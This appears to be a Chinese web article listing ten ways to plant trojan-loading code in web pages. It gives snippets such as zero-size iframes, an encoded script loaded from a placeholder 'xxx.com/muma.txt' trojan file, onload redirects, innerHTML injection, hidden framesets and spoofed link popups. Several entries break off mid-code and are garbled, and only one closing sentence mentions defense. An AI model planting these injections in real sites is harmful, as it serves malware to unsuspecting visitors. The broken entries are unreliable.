黑客挂马的各种方法
一般黑客挂马的代码都是 <iframe src=地址 width=0 height=0></iframe>这样的 其实还有很多挂马代码 下面全面介绍下 一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 三:js变形加密 <SCRIPT language="JScript.Encode"
src=http://www.xxx.com/muma.txt></script> 四:body挂马 <body onload="window.location='地址';"></body> 五:隐蔽挂马 top.document.body.innerHTML = top.document.body.innerHTML + '<iframe src="http://www.xxx.com/muma.htm/"></iframe>'; 六:css中挂马 body { 七:JAJA挂马 <SCRIPT language=javascript> 八:图片伪装 <html> 九:伪装调用: <frameset rows="444,0" cols="*"> 十:高级欺骗 <a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的 内容 </a> (url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width =800,height=600,left=10,top=10");
从这个思想出发,可以利用正则表达的方法构造出更加巧妙的挂马方法.防止这种攻击的方法就是对所有的用户提交的数据在发布前必须经过类型检验 |